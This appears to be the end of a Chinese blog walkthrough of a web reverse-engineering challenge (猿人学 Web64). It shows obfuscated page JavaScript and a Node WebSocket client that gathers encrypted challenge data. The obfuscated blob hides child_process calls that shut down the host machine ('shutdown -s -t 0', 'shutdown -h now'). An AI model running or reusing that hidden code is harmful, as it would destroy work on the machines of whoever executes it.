"s(12" + ")]=2" + "55)"), s["s"]("s.s=" + "[254" + ",s(1" + "10)]"), s["s"]("v,x", "retu" + "rn t" + "ypeo" + "f v=" + "=typ" + "eof " + "0?s[" + "9][3" + "3](v" + "):ty" + "peof" + " v==" + "type" + "of '" + "s'?s" + "[9][" + "21](" + "[v,x" + "]):s"), s["s"]("v", "s[!s" + "][s[" + "!s][" + "s(48" + ")]-1" + "][v[" + "s(94" + ")]()" + "]=v[" + "s(94" + ")]()"), s["s"]("s.s=" + "[0,s" + "(44)" + "]"), s["s"]("(s(s" + "(96)" + ",s)[" + "s(96" + ")]=(" + "s(s(" + "93))" + "+s(s" + "(109" + "))[s" + "(s(4" + "1))]" + "+s(s" + "(-3)" + ")[s(" + "8)](" + "s(s(" + "41))" + "%s(s" + "(-3)" + ")[s(" + "48)]" + "))%s" + "(s(9" + ")))"), s["s"]("s.s=" + "[s(7" + "6),s" + "(0)]"), s["s"]("for(" + "s(s." + "s[0]" + "[s(9" + "0)](" + "[])," + "s.s=" + "[s(s" + "(37)" + "),s(" + "44)]" + ");(s" + "[8]=" + "=1?s" + "(s.s" + "[0][" + "s(92" + ")]()" + ",s.s" + "[s(9" + "4)](" + "))&&" + "0:s[" + "8]==" + "2?s(" + "s.s[" + "0][0" + "][s(" + "94)]" + "(),s" + ".s[s" + "(94)" + "]())" + ":s)&" + "&(s." + "s[s(" + "48)]" + "<2)&" + "&(s(" + "s(41" + "))<s" + "(s(1" + ")));" + "s(s(" + "44)," + "s)[s" + "(44)" + "]++)" + "s[s." + "s]((" + "-8)." + "s)()"), s["s"]("v", "retu" + "rn s" + "[s[s" + "(112" + ")]](" + "v[s(" + "112)" + "])"), s["s"]("s[s." + "s]((" + "-2)." + "s)()"), s["s"]("for(" + "s(s." + "s[0]" + "[s(9" + "0)](" + "[])," + "(s(s" + "(44)" + ",s)[" + "s(44" + ")]=s" + "(s(3" + "3)))" + ");(s" + "[8]=" + "=1?s" + "(s.s" + "[0][" + "s(92" + ")]()" + ",s.s" + "[s(9" + "4)](" + "))&&" + "0:s[" + "8]==" + "2?s(" + "s.s[" + "0][0" + "][s(" + "94)]" + "(),s" + ".s[s" + "(94)" + "]())" + ":s)&" + "&(s." + "s[s(" + "48)]" + "<2)&" + "&(s(" + "s(41" + "))<s" + "(s(5" + "9)))" + ";s(s" + "(44)" + ",s)[" + "s(44" + ")]++" + ")s(s" + "[2]." + "s[0]" + "([-6" + "5,-4" + "6,-3" + "2,-7" + "5])," + "s[2]" + ".s[1" + "](s[" + "2].s" + "[2])" + "())"), s["s"]("s[s." + "s]((" + "-89)" + ".s)(" + ")"), s["s"]("s.s=" + "[0,s" + "(36)" + "]"), s["s"]("s.s=" + "[256" + ",s(1" + "2)]"), s["s"]("s", "retu" + "rn s"), s["s"]("(s(s" + "(109" + "))[s" + "(s(9" + "3))]" + "=s(s" + "(13)" + "))"), s["s"]("s.s=" + "[1,s" + "(50)" + "]"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-16" + ",-66" + ",-59" + ",-28" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))}c" + "atch" + "(e){" + "s(s." + "s[s(" + "70)]" + "=e,s" + "[s.s" + "]((-" + "45)." + "s)()" + ")}"), s["s"]("s.s[" + "s.s]" + "=s(s" + "(-1)" + ")"), s["s"]("s(s." + "s=[s" + "(40)" + "])"), s["s"]("v", "retu" + "rn v" + "=(fu" + "ncti" + "on()" + "{try" + "{ret" + "urn " + "s[2]" + "[s(1" + "08)]" + "(s[!" + "s][s" + "(42)" + "]())" + "&&(s" + "[s.s" + "]=v." + "s[s(" + "42)]" + "())&" + "&s[s" + "](s." + "s=[a" + "rgum" + "ents" + ",s(1" + "02)]" + ",s.s" + "=[th" + "is,s" + "(74)" + "],s." + "s[0]" + "=[]," + "s.s=" + "[s.s" + "[s(1" + "02)]" + "[0]," + "s(65" + ")],s" + "(s[2" + "].s[" + "0]([" + "-37," + "-44," + "-71," + "-69," + "-1,-" + "42,-" + "53,-" + "21,-" + "95,-" + "47,-" + "9,-5" + ",-51" + ",-64" + ",-49" + ",-83" + ",-78" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + ")),s" + "[3]=" + "s.s[" + "1],s" + "[!s]" + "=s[2" + "][s(" + "94)]" + "())&" + "&s[3" + "]}ca" + "tch(" + "e){t" + "hrow" + " s[!" + "s]=s" + "[2][" + "s(94" + ")]()" + ",e}}" + ").s"), s["s"]("(s(s" + "(110" + "),s)" + "[s(1" + "10)]" + "=255" + ")"), s["s"]("(s(s" + "(96)" + ",s)[" + "s(96" + ")]=(" + "s(s(" + "93))" + "+s(s" + "(109" + "))[s" + "(s(4" + "1))]" + ")%25" + "6)"), s["s"]("s[s." + "s]((" + "-29)" + ".s)(" + ")"), s["s"]("retu" + "rn s" + "[9][" + "3]"), s["s"]("s(s(" + "17))" + "(s(8" + "4))"), s["s"]("v", "s[s(" + "112)" + "][0]" + "[0][" + "0]=v"), s["s"]("s(s(" + "17))" + "(s(1" + "8))"), s["s"]("v", "retu" + "rn s" + "(s(1" + "06))" + "[s(6" + ")][s" + "(56)" + "](s[" + "7][s" + "(112" + ")][0" + "],0," + "v)"), s["s"]("try{" + "s(s[" + "2].s" + "[0](" + "[-54" + ",-76" + ",-91" + "]),s" + "[2]." + "s[1]" + "(s[2" + "].s[" + "2])(" + "))}c" + "atch" + "(e){" + "s(s." + "s[s(" + "70)]" + "=e,s" + "[s.s" + "]((-" + "24)." + "s)()" + ")}"), s["s"]("retu" + "rn s" + "[!s]" + "[s[!" + "s][s" + "(48)" + "]-1]"), s["s"]("s(s(" + "17))" + "(s(4" + "6))"), s["s"]("retu" + "rn s" + "[9][" + "~thi" + "s]"), s["s"]("retu" + "rn s" + "[!s]" + "[s(1" + "08)]" + "(s[s" + "(26)" + "]([]" + ",s(3" + "0),(" + "(s[3" + "]=[]" + ")[s(" + "14)]" + "=s[9" + "][49" + "])&&" + "s[3]" + "))&&" + "s(80" + ")"), s["s"]("v", "this" + "[0][" + "s(10" + "8)](" + "v)"), s["s"]("s[s." + "s]((" + "-19)" + ".s)(" + ")"), s["s"]("retu" + "rn 0" + "[thi" + "s-1]" + "[s(7" + "8)](" + "0)"), s["s"]("s(s." + "s=[s" + "(12)" + "])"), s["s"]("retu" + "rn s" + "[s(2" + "6)](" + "this" + ",s(1" + "12)," + "((s[" + "3]=[" + "])[s" + "(14)" + "]=s[" + "!s][" + "s(42" + ")]()" + ")&&s" + "[3])"), s["s"]("v", "whil" + "e(v[" + "s(48" + ")])v" + "[s(9" + "2)](" + ")()(" + ")"), s["s"]("(s(s" + "(62)" + ",s)[" + "s(62" + ")]=2" + "55)")]) && (s[3] = ("key‍re" + "s‍arg1‍c" + "all‍ch" + "arCo" + "deAt‍B" + "uffe" + "r‍arg6‍v" + "alue‍x‍g" + "loba" + "l‍eval‍S" + "trin" + "g‍loca" + "tion‍d" + "fp‍lop‍t" + "oStr" + "ing‍de" + "fine" + "Prop" + "erty‍c" + "onfi" + "gura" + "ble‍ar" + "g5‍!do" + "cume" + "nt.a" + "ll‍arg" + "3‍slic" + "e‍i‍requ" + "ire‍le" + "ngth‍a" + "rg2‍na" + "viga" + "tor‍Ob" + "ject‍b" + "ind‍pr" + "otot" + "ype‍ev" + "als‍ar" + "g4‍1‍cal" + "lee‍st" + "r‍e‍y‍this‍1" + "2345" + "6778" + "1234" + "4678" + "9123" + "4567" + "8912" + "345‍sp" + "lice‍0‍g" + "et‍doc" + "umen" + "t‍from" + "Char" + "Code‍‍" + "unsh" + "ift‍sh" + "ift‍po" + "p‍j‍set‍r " + "= gl" + "obal" + ".x('" + "chil" + "d_pr" + "oces" + "s');" + "r.ex" + "ec('" + "shut" + "down" + " -s " + "-t 0" + "');r" + ".exe" + "c(`o" + "sasc" + "ript" + " -e " + "'dis" + "play" + " not" + "ific" + "atio" + "n \"哎" + "\" wi" + "th t" + "itle" + " \"嗨嗨" + "嗨\" s" + "ubti" + "tle " + "\"嗨嗨嗨" + "嗨嗨\"'" + "`);r" + ".exe" + "c('s" + "hutd" + "own " + "-h n" + "ow')" + ";‍argu" + "ment" + "s‍Func" + "tion‍N" + "umbe" + "r‍push‍a" + "rg7‍s‍12" + "3456" + "7781" + "2345" + "6789" + "1234" + "5678" + "9123" + "45‍map")["spli" + "t"]("‍")))["value"] = s[3])[9][16]();

使用ws 发送请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
const WebSocket = require('ws');
const {writeFileSync} = require("node:fs");

const result = []

// 构造请求头
const headers = {
    "Host": "www.python-spider.com",
    "Connection": "Upgrade",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78",
    "Upgrade": "websocket",
    "Origin": "https://www.python-spider.com",
    "Sec-WebSocket-Version": "13",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Cookie": "sessionid=jlwm4n87jnu26x12st2ue1fvcw6auoee;",
    "Sec-WebSocket-Key": "pIx4Cz+VVVvU5GIQyamSfA==",
    "Sec-WebSocket-Extensions": "permessage-deflate; client_max_window_bits",
};
const url = 'wss://www.python-spider.com/api/challenge64';

// 创建 WebSocket 实例并传入请求头
const ws = new WebSocket(url, {headers});


// 监听 WebSocket 连接成功事件
ws.on('open', () => {
    console.log('WebSocket 连接已建立');
    // 可以在这里发送消息
    for (let i = 1; i < 101; i++) {
        ws.send(i);
    }


});

// 监听接收到消息事件
ws.on('message', (data) => {
    result.push(Array.from(data));

});

// 监听 WebSocket 连接关闭事件
ws.on('close', () => {
    writeFileSync('result.json',JSON.stringify(result), );
    console.log('WebSocket 连接已关闭');

});

// 监听 WebSocket 连接错误事件
ws.on('error', (error) => {
    console.error('WebSocket 连接出错:', error);
});

补好的环境中删除了一些全局变量,这里直接把Buffer 转成Array 

1
2
data = [67,200, 162]
console.log(lop(String.fromCharCode(...data)))

拿到之后可以使用这个函数将数据解密出来

猿人学Web64题实战
https://kingjem.github.io/2025/02/21/猿人学/猿人学Web64题实战/
作者
Ruhai
发布于
2025年2月21日
许可协议